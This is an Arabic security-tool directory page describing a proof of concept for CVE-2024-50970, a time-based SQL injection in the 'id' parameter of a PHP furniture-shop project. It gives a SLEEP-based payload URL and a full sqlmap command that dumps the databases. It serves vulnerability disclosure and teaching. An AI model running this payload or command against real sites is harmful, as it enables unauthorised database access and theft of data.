Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50970 — إثبات المفهوم يوضح حقن SQL قائم على الوقت في Itsourcecode Online Furniture Shopping Project 1.0 عبر معلمة id في orderview1.php، بما في ذلك خطوات الاستغلال وأوامر SQLMap. | Kitploit
أدوات/GitHubGitHub/akhlak2511/cve-2024-50970
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

إثبات المفهوم يوضح حقن SQL قائم على الوقت في Itsourcecode Online Furniture Shopping Project 1.0 عبر معلمة id في orderview1.php، بما في ذلك خطوات الاستغلال وأوامر SQLMap.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50970

الوصف

ثغرة حقن SQL في ملف orderview1.php من مشروع متجر الأثاث عبر الإنترنت Itsourcecode الإصدار 1.0 تسمح للمهاجمين عن بعد بتنفيذ أوامر SQL عشوائية عبر المتغير id.

نوع الثغرة

حقن SQL

بائع المنتج

Itsourcecode

قاعدة كود المنتج المتأثر:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

المكون المتأثر:

مشروع متجر الأثاث عبر الإنترنت Itsourcecode الإصدار 1.0 معرض لحقن SQL من خلال المتغير id في صفحة orderview1.php

متجهات الهجوم:

  1. قم بإعداد التطبيق محلياً، وسجل حساباً جديداً، ثم سجل الدخول به.
  2. انتقل إلى الرابط التالي في المتصفح: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. حقن حمولة SQL: قم بتعديل المتغير id في الرابط ليتضمن حمولة حقن SQL تعتمد على الوقت.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  • راقب استجابة التطبيق: يجب أن تستغرق الصفحة وقتاً أطول (10 ثوانٍ) للتحميل إذا نجح الحقن، مما يؤكد أن المتغير id معرض لحقن SQL.
  • استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
  • المراجع:

    1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    تنزيل الأداة